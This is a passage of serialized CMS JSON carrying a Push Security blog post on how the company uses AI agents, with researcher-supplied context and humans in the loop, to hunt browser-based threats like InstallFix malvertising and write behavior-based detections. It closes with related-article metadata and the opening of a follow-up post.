",{"data":18331,"content":18335,"nodeType":18112},{"target":18332},{"sys":18333},{"id":18334,"type":976,"linkType":977},"2YmiesBvJHGw4wiKEKzLUq",[18336],{"data":18337,"marks":18338,"value":18339,"nodeType":883},{},[],"creative",{"data":18341,"marks":18342,"value":951,"nodeType":883},{},[],{"data":18344,"content":18347,"nodeType":18112},{"target":18345},{"sys":18346},{"id":18107,"type":976,"linkType":977},[18348],{"data":18349,"marks":18350,"value":522,"nodeType":883},{},[],{"data":18352,"marks":18353,"value":951,"nodeType":883},{},[],{"data":18355,"content":18359,"nodeType":18112},{"target":18356},{"sys":18357},{"id":18358,"type":976,"linkType":977},"6Zosy4SU0LpjlaSWX75peb",[18360],{"data":18361,"marks":18362,"value":18363,"nodeType":883},{},[],"campaigns",{"data":18365,"marks":18366,"value":18367,"nodeType":883},{},[]," tied to malvertising scams.",{"data":18369,"content":18373,"nodeType":971},{"target":18370},{"sys":18371},{"id":18372,"type":976,"linkType":977},"53U3LHhhHFYnEpShdLmDqs",[],{"data":18375,"content":18376,"nodeType":879},{},[18377],{"data":18378,"marks":18379,"value":18380,"nodeType":883},{},[],"With an agentic approach, we could scale this expertise and reduce the time it takes to go from technique discovery to production-ready detection. This speed is critical now because adversaries are also using AI tools to do their work, exploding the number of trivial-to-rotate indicators of compromise and overwhelming existing detection workflows that lack an equivalent machine speed.",{"data":18382,"content":18386,"nodeType":971},{"target":18383},{"sys":18384},{"id":18385,"type":976,"linkType":977},"1u00uFbC4xsvP9lqahXbgD",[],{"data":18388,"content":18389,"nodeType":1036},{},[18390],{"data":18391,"marks":18392,"value":18394,"nodeType":883},{},[18393],{"type":916},"Scaling behavioral detections, not just making bigger blocklists",{"data":18396,"content":18397,"nodeType":879},{},[18398],{"data":18399,"marks":18400,"value":18401,"nodeType":883},{},[],"But output numbers alone don’t tell the story of successful detections. That’s the other problem we set out to solve at scale: Most secure browser solutions rely on detection logic based on blocking known-bad indicators like domains, IPs, and URLs.",{"data":18403,"content":18404,"nodeType":879},{},[18405,18410],{"data":18406,"marks":18407,"value":18409,"nodeType":883},{},[18408],{"type":916},"If your solution offers 1,000 detections, and they’re all based on known-bad indicators that are easily rotated, then you’ve got 1,000 detections that worked once and will likely never fire again. ",{"data":18411,"marks":18412,"value":18413,"nodeType":883},{},[],"They certainly won’t catch subtle adaptations in adversary techniques that don’t rely on infrastructure changes, which are easy for attackers to swap anyway. ",{"data":18415,"content":18416,"nodeType":879},{},[18417],{"data":18418,"marks":18419,"value":18420,"nodeType":883},{},[],"Push does it differently. Our detection engine is focused on hunting for tactics, techniques, and procedures: the behavioral fingerprints of an attack, not just the infrastructure it runs on. ",{"data":18422,"content":18426,"nodeType":971},{"target":18423},{"sys":18424},{"id":18425,"type":976,"linkType":977},"5jR3YVUiusHGnXDOyrgYpr",[],{"data":18428,"content":18429,"nodeType":879},{},[18430],{"data":18431,"marks":18432,"value":18433,"nodeType":883},{},[],"Instead of blocking based on known-bad domains, URLs, and IPs, our detections are built around user-level and page-level behaviors like what scripts load, how redirects behave, what events fire, what actions a user takes and what happens next, etc. (In fact, Push detections don’t even use any infrastructure-based IOCs, though customers can write their own custom detections if they have a specific IOC they’re keeping an eye on.)",{"data":18435,"content":18436,"nodeType":879},{},[18437,18442,18452],{"data":18438,"marks":18439,"value":18441,"nodeType":883},{},[18440],{"type":916},"All the detections we write would survive infrastructure rotation by adversaries, and many of our existing detections have caught never-before-seen evolutions in TTPs. That’s because we focus on the top of the ",{"data":18443,"content":18447,"nodeType":18112},{"target":18444},{"sys":18445},{"id":18446,"type":976,"linkType":977},"1qegIy4rMdm5XZXnIEoKpE",[18448],{"data":18449,"marks":18450,"value":3151,"nodeType":883},{},[18451],{"type":916},{"data":18453,"marks":18454,"value":18456,"nodeType":883},{},[18455],{"type":916},", the indicators that are hardest for attackers to change.",{"data":18458,"content":18459,"nodeType":879},{},[18460],{"data":18461,"marks":18462,"value":18463,"nodeType":883},{},[],"This focus on detecting TTPs has always been our approach. But with the acceleration in both attack types and the ease with which adversaries rotate infrastructure, we needed to build capabilities that scaled our knowledge. ",{"data":18465,"content":18466,"nodeType":879},{},[18467],{"data":18468,"marks":18469,"value":18470,"nodeType":883},{},[],"We did this not by replacing researchers, but by continuously activating their expertise. You can hear what our CEO and Co-founder Adam had to say about this below. ",{"data":18472,"content":18476,"nodeType":971},{"target":18473},{"sys":18474},{"id":18475,"type":976,"linkType":977},"C9gr4nF3f6CW45Aol9xij",[],{"data":18478,"content":18479,"nodeType":905},{},[],{"data":18481,"content":18482,"nodeType":909},{},[18483],{"data":18484,"marks":18485,"value":18487,"nodeType":883},{},[18486],{"type":916},"Core principles for agentic threat hunting",{"data":18489,"content":18490,"nodeType":879},{},[18491],{"data":18492,"marks":18493,"value":18494,"nodeType":883},{},[],"Three principles make Push's agentic threat hunting and detection engineering pipeline work:",{"data":18496,"content":18497,"nodeType":1036},{},[18498],{"data":18499,"marks":18500,"value":18502,"nodeType":883},{},[18501],{"type":916},"Context matters more than custom models",{"data":18504,"content":18505,"nodeType":879},{},[18506],{"data":18507,"marks":18508,"value":18509,"nodeType":883},{},[],"We’re not AI researchers; we’re security researchers — we aren't trying to compete in building the most intelligent models. And in our view, AI models are quickly becoming commoditized like cloud infrastructure, anyway. Luckily, the commercial models today already excel at understanding web code. We just need to harness their power with our expertise.",{"data":18511,"content":18512,"nodeType":879},{},[18513,18517,18522],{"data":18514,"marks":18515,"value":18516,"nodeType":883},{},[],"So at Push, we use a variety of commercial AI models and tools in complementary ways. What matters most is the telemetry they analyze, and that’s where Push’s existing product infrastructure shines: We’re already deployed into over ",{"data":18518,"marks":18519,"value":18521,"nodeType":883},{},[18520],{"type":916},"3 million browsers worldwide",{"data":18523,"marks":18524,"value":18525,"nodeType":883},{},[],", and the Push browser extension includes a component that operates as a flight recorder to locally record everything that matters inside a browser session.",{"data":18527,"content":18528,"nodeType":879},{},[18529],{"data":18530,"marks":18531,"value":18532,"nodeType":883},{},[],"This universe of metadata — DOM elements, tab context, script execution, network traffic, user actions, credential entry, etc. — becomes the searchable corpus for hunts. Metadata is stored locally in users’ browsers and only queried during targeted threat hunts. ",{"data":18534,"content":18535,"nodeType":879},{},[18536],{"data":18537,"marks":18538,"value":18539,"nodeType":883},{},[],"This approach avoids dragnet collection of sensitive data. Instead, we focus on collecting metadata and distilling that into patterns and insights that provide context for agents to perform their analysis. This means that Push also does not train or fine-tune models on customer data.",{"data":18541,"content":18542,"nodeType":1036},{},[18543],{"data":18544,"marks":18545,"value":18547,"nodeType":883},{},[18546],{"type":916},"Agents are only as good as the context you give them. Good context is researcher-led",{"data":18549,"content":18550,"nodeType":879},{},[18551],{"data":18552,"marks":18553,"value":18554,"nodeType":883},{},[],"AI agents don’t know how to identify the TTPs of browser-based attacks until you give them the right context, and Push researchers have spent years unpacking these techniques and tools. Agents at Push consume our internal knowledge base of identified TTPs, and both humans and agents perform meta-analyses to check their work. The agents have access to large libraries of traces of human interactions with real phishing kits. This is a powerful dataset to build on.",{"data":18556,"content":18557,"nodeType":879},{},[18558],{"data":18559,"marks":18560,"value":18561,"nodeType":883},{},[],"When we don’t get the results we want from AI models, the question is “What context is it missing? What does our human team know that the agents don’t, and how can we give them that context — do they need data, tools, better workflows?” That closes the gap in performance and keeps quality high.",{"data":18563,"content":18564,"nodeType":1036},{},[18565],{"data":18566,"marks":18567,"value":18569,"nodeType":883},{},[18568],{"type":916},"Integrated architecture that makes agentic AI the throughput layer, not a bolt-on",{"data":18571,"content":18572,"nodeType":879},{},[18573],{"data":18574,"marks":18575,"value":18576,"nodeType":883},{},[],"The constraint we’re trying to break by using AI isn’t knowledge, it’s throughput. Our researchers deeply understand the techniques and tools. An agentic pipeline can apply that understanding continuously across millions of browsers and trillions of events, ingest new external signals, generate hunt hypotheses, triage results, and return only the findings that warrant escalation.",{"data":18578,"content":18579,"nodeType":879},{},[18580],{"data":18581,"marks":18582,"value":18583,"nodeType":883},{},[],"This approach relies on tight integration of our product and our agentic workflows. We’ll take a closer look at that in the next section.",{"data":18585,"content":18586,"nodeType":905},{},[],{"data":18588,"content":18589,"nodeType":909},{},[18590],{"data":18591,"marks":18592,"value":18594,"nodeType":883},{},[18593],{"type":916},"How the agentic detection pipeline runs",{"data":18596,"content":18597,"nodeType":879},{},[18598],{"data":18599,"marks":18600,"value":18601,"nodeType":883},{},[],"Now let’s look at how agentic threat detection actually works, and some of the emerging best practices we’ve identified. We'll cover two example hunts, one initiated autonomously by the agents themselves, and one by our research team. ",{"data":18603,"content":18604,"nodeType":1036},{},[18605],{"data":18606,"marks":18607,"value":18609,"nodeType":883},{},[18608],{"type":916},"Example 1: Autonomous threat hunt",{"data":18611,"content":18612,"nodeType":879},{},[18613],{"data":18614,"marks":18615,"value":18616,"nodeType":883},{},[],"Push’s threat hunting pipeline ingested context from research articles describing a new attack technique, and an agent developed hypotheses on what to hunt for across Push’s install base to identify instances of this attack. ",{"data":18618,"content":18619,"nodeType":879},{},[18620],{"data":18621,"marks":18622,"value":18623,"nodeType":883},{},[],"The agent crafted detection queries and then refined them to reduce false positives. The successful query ran across stored metadata and returned results, validating that there were zero false positives. ",{"data":18625,"content":18626,"nodeType":879},{},[18627],{"data":18628,"marks":18629,"value":18630,"nodeType":883},{},[],"The validated query became a scheduled job that runs on a regular cadence to monitor for potentially malicious signals. A triage agent then received any matches, did an initial analysis, and passed anything that looked suspicious to another agent to perform deeper analysis. This deep analysis agent wields the full investigative toolkit that a human researcher would — using Push’s internal knowledge base, domain age and registration analysis, URLScan and whois lookups, DOM image analysis, and contextual analysis of page-level and user-level behaviors, etc.",{"data":18632,"content":18633,"nodeType":879},{},[18634],{"data":18635,"marks":18636,"value":18637,"nodeType":883},{},[],"Within a few minutes, it can filter a thousand or more signals in a hunt trace down to a handful with meaning and provide an actionable assessment. Then, once the TTP was well-understood, other agents wrote and refined detections that can raise alerts for customers when an event of this type is seen. The Push platform immediately applies the customer’s configured security controls, such as blocking users from interacting with malicious pages.",{"data":18639,"content":18640,"nodeType":1036},{},[18641],{"data":18642,"marks":18643,"value":18645,"nodeType":883},{},[18644],{"type":916},"Example 2: Human-initiated threat hunt",{"data":18647,"content":18648,"nodeType":879},{},[18649],{"data":18650,"marks":18651,"value":18652,"nodeType":883},{},[],"Now, going back to the example from the beginning of the article: InstallFix. This hunt started with a thorny problem our research team needed to solve: How to detect bad things downstream of a user interacting with a Google ad? We needed a way to pinpoint the bad links from the good ones.",{"data":18654,"content":18655,"nodeType":879},{},[18656,18660,18665,18668,18673,18676,18681],{"data":18657,"marks":18658,"value":18659,"nodeType":883},{},[],"Our researchers collaborated with agents to formulate the right parameters for hunt queries, taking into account that good ads are normally bought by companies with marketing budgets, so therefore ads will be expected to redirect to pages hosted on custom domains, not shared domains like ",{"data":18661,"marks":18662,"value":18664,"nodeType":883},{},[18663],{"type":916},"*pages.dev",{"data":18666,"marks":18667,"value":2524,"nodeType":883},{},[],{"data":18669,"marks":18670,"value":18672,"nodeType":883},{},[18671],{"type":916},"*workers.dev",{"data":18674,"marks":18675,"value":2524,"nodeType":883},{},[],{"data":18677,"marks":18678,"value":18680,"nodeType":883},{},[18679],{"type":916},"*squarespace.com",{"data":18682,"marks":18683,"value":18684,"nodeType":883},{},[],", etc.",{"data":18686,"content":18687,"nodeType":879},{},[18688],{"data":18689,"marks":18690,"value":18691,"nodeType":883},{},[],"Our AI agents already understood key TTPs that indicated potential maliciousness on a page: password prompts, file downloads, OAuth integrations, clipboard copies, and similar user prompts that are frequently abused.",{"data":18693,"content":18694,"nodeType":879},{},[18695],{"data":18696,"marks":18697,"value":18698,"nodeType":883},{},[],"The agent ran several queries that returned matching browsing traces — the term we use for sequences of events in a session or tab context — where the user clicked a Google ad, was redirected to a page on a shared hosting domain, and then clicked a button to copy content to their clipboard.",{"data":18700,"content":18704,"nodeType":971},{"target":18701},{"sys":18702},{"id":18703,"type":976,"linkType":977},"4IWOrWuvbwzWRJUkINiwKH",[],{"data":18706,"content":18707,"nodeType":879},{},[18708],{"data":18709,"marks":18710,"value":18711,"nodeType":883},{},[],"We got back high-fidelity findings and then tuned the query into a continuous detection that leveraged existing detection logic around related techniques. This process also effectively back-tests new detections, so we know we’re not going to generate a lot of false positives. Result: A new detection against a new technique, plus several improvements to existing detections.",{"data":18713,"content":18714,"nodeType":1036},{},[18715],{"data":18716,"marks":18717,"value":18719,"nodeType":883},{},[18718],{"type":916},"What infrastructure is needed for agentic threat hunting?",{"data":18721,"content":18722,"nodeType":879},{},[18723],{"data":18724,"marks":18725,"value":18726,"nodeType":883},{},[],"Both of these examples illustrate the end-to-end workflows supported by this pipeline. From an infrastructure perspective, you can think about the pipeline as composed of:",{"data":18728,"content":18729,"nodeType":1531},{},[18730,18745,18760,18775,18790],{"data":18731,"content":18732,"nodeType":1535},{},[18733],{"data":18734,"content":18735,"nodeType":879},{},[18736,18741],{"data":18737,"marks":18738,"value":18740,"nodeType":883},{},[18739],{"type":916},"A flight recorder: ",{"data":18742,"marks":18743,"value":18744,"nodeType":883},{},[],"The Push extension-powered capability that collects and locally stores browser event metadata from users’ browsers.",{"data":18746,"content":18747,"nodeType":1535},{},[18748],{"data":18749,"content":18750,"nodeType":879},{},[18751,18756],{"data":18752,"marks":18753,"value":18755,"nodeType":883},{},[18754],{"type":916},"A knowledge base:",{"data":18757,"marks":18758,"value":18759,"nodeType":883},{},[]," Structured knowledge about what Push knows about TTPs and its existing body of detection logic, as well as externally sourced signals of new attack trends.",{"data":18761,"content":18762,"nodeType":1535},{},[18763],{"data":18764,"content":18765,"nodeType":879},{},[18766,18771],{"data":18767,"marks":18768,"value":18770,"nodeType":883},{},[18769],{"type":916},"Agents as tools: ",{"data":18772,"marks":18773,"value":18774,"nodeType":883},{},[],"Role-segmented agents that work as a team to triage, investigate, develop hunt queries, return analyses, write detections, and review each others’ work for completeness and accuracy.",{"data":18776,"content":18777,"nodeType":1535},{},[18778],{"data":18779,"content":18780,"nodeType":879},{},[18781,18786],{"data":18782,"marks":18783,"value":18785,"nodeType":883},{},[18784],{"type":916},"Humans in the loop: ",{"data":18787,"marks":18788,"value":18789,"nodeType":883},{},[],"Human researchers who collaborate with agents to initiate hunts and tune detections.",{"data":18791,"content":18792,"nodeType":1535},{},[18793],{"data":18794,"content":18795,"nodeType":879},{},[18796,18801],{"data":18797,"marks":18798,"value":18800,"nodeType":883},{},[18799],{"type":916},"Platform controls: ",{"data":18802,"marks":18803,"value":18804,"nodeType":883},{},[],"The Push administrator-configured controls that specify how to respond to detected events like AiTM phishing, tuneable by scope, user groups, browser profiles, apps, etc.",{"data":18806,"content":18810,"nodeType":971},{"target":18807},{"sys":18808},{"id":18809,"type":976,"linkType":977},"7FY0vCBUXOt4vnudFuKALC",[],{"data":18812,"content":18813,"nodeType":1036},{},[18814],{"data":18815,"marks":18816,"value":18818,"nodeType":883},{},[18817],{"type":916},"What are the best practices for agentic threat detection?",{"data":18820,"content":18821,"nodeType":879},{},[18822,18826,18831],{"data":18823,"marks":18824,"value":18825,"nodeType":883},{},[],"To be effective, agents must specialize and focus. This is the ",{"data":18827,"marks":18828,"value":18830,"nodeType":883},{},[18829],{"type":916},"agents as tools",{"data":18832,"marks":18833,"value":18834,"nodeType":883},{},[]," concept. When we’re asking AI agents to take massive amounts of data and make a high-level decision about a signal in observed browser events, they must work as a team, finding intelligent ways to condense information without losing important context or hallucinating.",{"data":18836,"content":18837,"nodeType":879},{},[18838],{"data":18839,"marks":18840,"value":18841,"nodeType":883},{},[],"Creating a hierarchy of agent jobs — including agents to perform meta-analyses to catch mistakes and verify conclusions — makes the agents effective by giving them a manageable focus that controls the size of context windows.",{"data":18843,"content":18847,"nodeType":971},{"target":18844},{"sys":18845},{"id":18846,"type":976,"linkType":977},"3fzJCknMUmh4Z7YnhBSbsT",[],{"data":18849,"content":18850,"nodeType":879},{},[18851],{"data":18852,"marks":18853,"value":18854,"nodeType":883},{},[],"Creating an agentic workflow requires operationalizing your internal knowledge in a repeatable and trustworthy way. Sharing rich context from human discoveries is the key to getting the best results out of agents. ",{"data":18856,"content":18857,"nodeType":879},{},[18858,18862,18867],{"data":18859,"marks":18860,"value":18861,"nodeType":883},{},[],"It's vital too that the agent uses ",{"data":18863,"marks":18864,"value":18866,"nodeType":883},{},[18865],{"type":916},"privacy-preserving methods and infrastructure.",{"data":18868,"marks":18869,"value":18870,"nodeType":883},{},[]," The Push agent is designed to respect customer and user privacy while enabling high-fidelity detections. We do this by collecting broad browser metadata but storing it locally in users’ browsers and only querying that metadata during active threat hunting investigations.",{"data":18872,"content":18873,"nodeType":905},{},[],{"data":18875,"content":18876,"nodeType":909},{},[18877],{"data":18878,"marks":18879,"value":18881,"nodeType":883},{},[18880],{"type":916},"The compounding effect and how it benefits Push customers",{"data":18883,"content":18884,"nodeType":879},{},[18885],{"data":18886,"marks":18887,"value":18888,"nodeType":883},{},[],"At Push, we think about our detection capability as two learning loops with a compounding effect: An inner loop that serves as our real-time detection and response engine for known attacker techniques, and an outer loop that is the continuous learning our agents do as they hunt for new threats, analyze emerging behaviors, and create new detections. ",{"data":18890,"content":18891,"nodeType":879},{},[18892],{"data":18893,"marks":18894,"value":18895,"nodeType":883},{},[],"The outer loop feeds the inner loop, and vice versa.",{"data":18897,"content":18901,"nodeType":971},{"target":18898},{"sys":18899},{"id":18900,"type":976,"linkType":977},"1Jjqll7IIX2QRxN37gjFMH",[],{"data":18903,"content":18904,"nodeType":879},{},[18905],{"data":18906,"marks":18907,"value":18908,"nodeType":883},{},[],"Customers benefit from this approach because it means they:",{"data":18910,"content":18911,"nodeType":1531},{},[18912,18933,18943],{"data":18913,"content":18914,"nodeType":1535},{},[18915],{"data":18916,"content":18917,"nodeType":879},{},[18918,18922,18929],{"data":18919,"marks":18920,"value":18921,"nodeType":883},{},[],"Regularly receive ready-made detections against both known and emerging browser-based threats, without having to write their own detections. (Push also provides the ability to write your own ",{"data":18923,"content":18925,"nodeType":940},{"uri":18924},"\u002Fhelp\u002Faudience\u002Fengineering\u002Fresources\u002Fcustom-detections",[18926],{"data":18927,"marks":18928,"value":4649,"nodeType":883},{},[],{"data":18930,"marks":18931,"value":18932,"nodeType":883},{},[],", too, for environment-specific use cases.)",{"data":18934,"content":18935,"nodeType":1535},{},[18936],{"data":18937,"content":18938,"nodeType":879},{},[18939],{"data":18940,"marks":18941,"value":18942,"nodeType":883},{},[],"Can configure Push’s response actions based on their security goals and environment. Agents act as the threat-hunting and detection engineering team; Push customers set the thresholds for how they want to respond. For example, customers can use Push controls to block all AiTM phishing attacks (or even carve out exceptions for their own incident responders to be able to visit malicious pages with just a warning), and agents continually feed new indicators into detection logic for that class of attack.",{"data":18944,"content":18945,"nodeType":1535},{},[18946],{"data":18947,"content":18948,"nodeType":879},{},[18949],{"data":18950,"marks":18951,"value":18952,"nodeType":883},{},[],"Get pre-digested and actionable intelligence from every detection, with extremely high fidelity.",{"data":18954,"content":18955,"nodeType":879},{},[18956],{"data":18957,"marks":18958,"value":18959,"nodeType":883},{},[],"This all equates to your own advanced browser threat protection, without requiring the specialized in-house expertise we’ve spent years building.",{"data":18961,"content":18962,"nodeType":879},{},[18963],{"data":18964,"marks":18965,"value":18966,"nodeType":883},{},[],"If you’re a Push customer, you already know that we regularly collaborate with security teams to identify and refine detection use cases, and assist with investigations. In the past few months alone, we’ve worked closely with teams targeted by device code phishing, and InstallFix and ClickFix campaigns, among others. ",{"data":18968,"content":18969,"nodeType":879},{},[18970],{"data":18971,"marks":18972,"value":18973,"nodeType":883},{},[],"If you’re not a customer and are curious about how Push’s agentic threat hunting and detection engineering capabilities can address your use cases, please get in touch.",{"data":18975,"content":18979,"nodeType":971},{"target":18976},{"sys":18977},{"id":18978,"type":976,"linkType":977},"607jrBjlD1vtcbkDfD04DE",[],{"data":18981,"content":18982,"nodeType":905},{},[],{"data":18984,"content":18985,"nodeType":909},{},[18986],{"data":18987,"marks":18988,"value":18990,"nodeType":883},{},[18989],{"type":916},"Learn more",{"data":18992,"content":18993,"nodeType":879},{},[18994],{"data":18995,"marks":18996,"value":1729,"nodeType":883},{},[],{"data":18998,"content":18999,"nodeType":879},{},[19000],{"data":19001,"marks":19002,"value":1736,"nodeType":883},{},[],{"data":19004,"content":19005,"nodeType":879},{},[19006,19009,19016],{"data":19007,"marks":19008,"value":6671,"nodeType":883},{},[],{"data":19010,"content":19012,"nodeType":940},{"uri":19011},"\u002Fdemo",[19013],{"data":19014,"marks":19015,"value":6679,"nodeType":883},{},[],{"data":19017,"marks":19018,"value":6683,"nodeType":883},{},[],{"entries":19020},{"inline":19021,"hyperlink":19022,"block":19049},[],[19023,19027,19029,19031,19033,19037,19041,19045],{"sys":19024,"__typename":1967,"title":19025,"slug":19026},{"id":18107},"How cyber criminals power malvertising scams with stolen accounts","cyber-criminal-ecosystem-analysis",{"sys":19028,"__typename":1967,"title":10711,"slug":10714},{"id":9708},{"sys":19030,"__typename":1967,"title":7965,"slug":7968},{"id":7130},{"sys":19032,"__typename":1967,"title":16299,"slug":362},{"id":13311},{"sys":19034,"__typename":1967,"title":19035,"slug":19036},{"id":18308},"ConsentFix: Analyzing a browser-native ClickFix-style attack that hijacks OAuth consent grants","consentfix",{"sys":19038,"__typename":1967,"title":19039,"slug":19040},{"id":18334},"Google Search malvertising campaign continues, now impersonating Ahrefs","google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"sys":19042,"__typename":1967,"title":19043,"slug":19044},{"id":18358},"Uncovering a Calendly-themed phishing campaign targeting business ad manager accounts","uncovering-a-calendly-themed-phishing-campaign",{"sys":19046,"__typename":1967,"title":19047,"slug":19048},{"id":18446},"Our design philosophy: Detecting what matters","our-design-philosophy-detecting-what-matters",[19050,19071,19078,19110,19117,19121,19129,19137,19151,19158],{"sys":19051,"__typename":1785,"content":19052,"name":19070,"title":59},{"id":18210},{"json":19053},{"nodeType":875,"data":19054,"content":19055},{},[19056,19063],{"nodeType":879,"data":19057,"content":19058},{},[19059],{"nodeType":883,"value":19060,"marks":19061,"data":19062},"In this article, we’ll outline how Push uses AI agents as a force multiplier for identifying emerging threats that target organizations via the browser — think: ClickFix, vibecoded phishing sites, AiTM kits, cloned login pages, ConsentFix attacks, malicious OAuth apps, device code phishing, sites impersonating Claude Code installers, etc. — and share what we’ve learned. ",[],{},{"nodeType":879,"data":19064,"content":19065},{},[19066],{"nodeType":883,"value":19067,"marks":19068,"data":19069},"We’ll cover the architectural decisions we made that enable the successful implementation of agents and some emerging best practices we’ve identified; discuss why our hunts focus on extracting techniques, not indicators; and illustrate how Push customers are benefitting from this agentic pipeline.",[],{},"Agentic Threat Hunting Blog IB1",{"sys":19072,"__typename":1765,"title":7187,"caption":19073,"layoutMode":59,"file":19074},{"id":18372},"Browser and identity-based techniques have exploded since we first launched our attack matrix",{"url":19075,"width":19076,"height":19077},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002FL0Yc77y9vzrKVD72BQGX2\u002F4ffe0bf61bd62f025262b8efd74394b7\u002FBrowser___Identity_Attacks_Matrix__1_.png",6160,4432,{"sys":19079,"__typename":1785,"content":19080,"name":19109,"title":59},{"id":18385},{"json":19081},{"nodeType":875,"data":19082,"content":19083},{},[19084,19102],{"nodeType":879,"data":19085,"content":19086},{},[19087,19091,19098],{"nodeType":883,"value":19088,"marks":19089,"data":19090},"Push researchers are seeing ",[],{},{"nodeType":940,"data":19092,"content":19093},{"uri":2755},[19094],{"nodeType":883,"value":19095,"marks":19096,"data":19097},"extensive evidence of LLM use",[],{},{"nodeType":883,"value":19099,"marks":19100,"data":19101}," in attacks we detect, from LLM-generated phishing kits and tools to vibe-coded cloned pages, demonstrating how much adversaries have embraced these tools to expedite their work. ",[],{},{"nodeType":879,"data":19103,"content":19104},{},[19105],{"nodeType":883,"value":19106,"marks":19107,"data":19108},"In particular, we’ve observed operator-gated payload delivery that greatly reduces the likelihood that malicious sites will be flagged and added to known-bad detection lists because they’re only served to active targets, using gated landing pages, anti-bot checks, and other methods to evade proactive infrastructure scanning. This reinforces the need for browser-based detection at the point the user interacts with the page.",[],{},"Agentic Threat Hunting Blog IB2",{"sys":19111,"__typename":1765,"title":19112,"caption":19113,"layoutMode":59,"file":19114},{"id":18425},"Sample detection - blog article - custom branding","Sample detection details in the Push admin console for a blocked phishing event",{"url":19115,"width":1781,"height":19116},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6k8qVn1iYXbBl6lcHvphIa\u002Fdd802537d883cf6ddafdd78034c3412a\u002Fsample_detection.png",766,{"sys":19118,"__typename":1773,"title":19119,"youTubeUrl":19120},{"id":18475},"Adam Bateman: Agentic AI is a Force Multiplier","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=F5Qv-su0qQA",{"sys":19122,"__typename":1765,"title":19123,"caption":19124,"layoutMode":59,"file":19125},{"id":18703},"Dissect agent output - agentic threat hunting blog","Summary from the work of Push’s deep investigation AI agent on the initial InstallFix attack detected by Push.",{"url":19126,"width":19127,"height":19128},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6t86kpGUwCVvrJEfVic1Cr\u002Ff41986585203764155d736d26cee2176\u002Fagentic_summary_example_installfix.png",1998,1428,{"sys":19130,"__typename":1765,"title":19131,"caption":19132,"layoutMode":59,"file":19133},{"id":18809},"Detection engine diagram - agentic threat blog","The Push detection engine combines deep browser telemetry with agentic workflows to rapidly respond to emerging threats.  ",{"url":19134,"width":19135,"height":19136},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F1zbE1t82gPo7pgqkAayTcZ\u002F72046ea5db9b80c77053343223025163\u002Fplatform_diagram_v3.png",1134,762,{"sys":19138,"__typename":1785,"content":19139,"name":19150,"title":59},{"id":18846},{"json":19140},{"data":19141,"content":19142,"nodeType":875},{},[19143],{"data":19144,"content":19145,"nodeType":879},{},[19146],{"data":19147,"marks":19148,"value":19149,"nodeType":883},{},[],"Use agents as an excuse to operationalize your internal knowledge once and for all. Every security team has a venerable silo of knowledge — that one person who just knows how to do that one major thing. Now, that can be an AI resource accessible to all, at any time, whenever you need it most.","Agentic Threat Hunting Blog IB4",{"sys":19152,"__typename":1765,"title":19153,"caption":19154,"layoutMode":59,"file":19155},{"id":18900},"Learning loops diagram - agentic threat blog","Two learning loops for known and unknown threats create a compounding effect for Push’s ability to defend against browser-based attacks.",{"url":19156,"width":19157,"height":19116},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F6TQdqvjhG4AYHITcR1MV9s\u002Fb1e1c337f50005186f6022004543023b\u002Flearning_loops_v3.png",1001,{"sys":19159,"__typename":13297,"type":13298,"ctaText":19160,"buttonLabel":19161,"buttonColour":13301,"buttonUrl":19162},{"id":18978},"Book a demo to learn more about our agentic threat hunting capabilities and how they can benefit your security team.","Book a Demo","https:\u002F\u002Fsite.dev.pushsecurity.com\u002Fdemo\u002F",{"items":19164},[],{},"How we built an agentic threat hunting pipeline at Push","2026-05-12T00:00:00.000Z",{"items":19169},[19170,19744,20425],{"__typename":1967,"sys":19171,"content":19173,"title":19730,"synopsis":19731,"hashTags":59,"publishedDate":19732,"slug":19733,"tagsCollection":19734,"authorsCollection":19740},{"id":19172},"2nQU0gDEqgarstvFMqFTzn",{"json":19174},{"data":19175,"content":19176,"nodeType":875},{},[19177,19184,19191,19211,19219,19226,19234,19237,19244,19251,19269,19276,19284,19291,19298,19305,19312,19318,19321,19328,19335,19342,19361,19368,19375,19382,19389,19396,19403,19410,19417,19435,19442,19449,19456,19459,19466,19473,19480,19487,19493,19500,19507,19514,19521,19527,19534,19541,19548,19555,19582,19589,19596,19603,19610,19626,19633,19640,19647,19654,19660,19667,19674,19681,19687,19690,19697,19714],{"data":19178,"content":19179,"nodeType":879},{},[19180],{"data":19181,"marks":19182,"value":19183,"nodeType":883},{},[],"What would it take to vibecode your own AI-driven threat hunting pipeline? ",{"data":19185,"content":19186,"nodeType":879},{},[19187],{"data":19188,"marks":19189,"value":19190,"nodeType":883},{},[],"The commercial models are right there. You’ve probably got a spare weekend coming up, a really nice espresso machine, and a few bucks for tokens. (Is there already an HGTV series on this?)",{"data":19192,"content":19193,"nodeType":879},{},[19194,19198,19207],{"data":19195,"marks":19196,"value":19197,"nodeType":883},{},[],"We recently published a ",{"data":19199,"content":19201,"nodeType":940},{"uri":19200},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fcan-ai-replace-a-threat-researcher-what-we-learned-building-an-agentic-threat-hunting-pipeline",[19202],{"data":19203,"marks":19204,"value":19206,"nodeType":883},{},[19205],{"type":948},"detailed look",{"data":19208,"marks":19209,"value":19210,"nodeType":883},{},[]," at how we use AI agents as a force multiplier for Push’s threat hunting and detection engineering capabilities.One intriguing detail you might have noticed in that article is that at Push, we treat commercial AI models as commoditized infrastructure, akin to cloud computing.",{"data":19212,"content":19213,"nodeType":879},{},[19214],{"data":19215,"marks":19216,"value":19218,"nodeType":883},{},[19217],{"type":916},"So it’s a cheeky question, but a fair one, because if Push is using commercial models, what exactly are you paying for?",{"data":19220,"content":19221,"nodeType":879},{},[19222],{"data":19223,"marks":19224,"value":19225,"nodeType":883},{},[],"It turns out that the models are the easiest things to replace, and in fact we swap out different models with little impact on detection performance. What’s much harder to build is the expertise: the technical knowledge of various attack techniques, the instrumentation in the browser that produces the structured telemetry, and the enforcement layer that turns detections into real-time protection.",{"data":19227,"content":19228,"nodeType":879},{},[19229],{"data":19230,"marks":19231,"value":19233,"nodeType":883},{},[19232],{"type":916},"Let’s break it 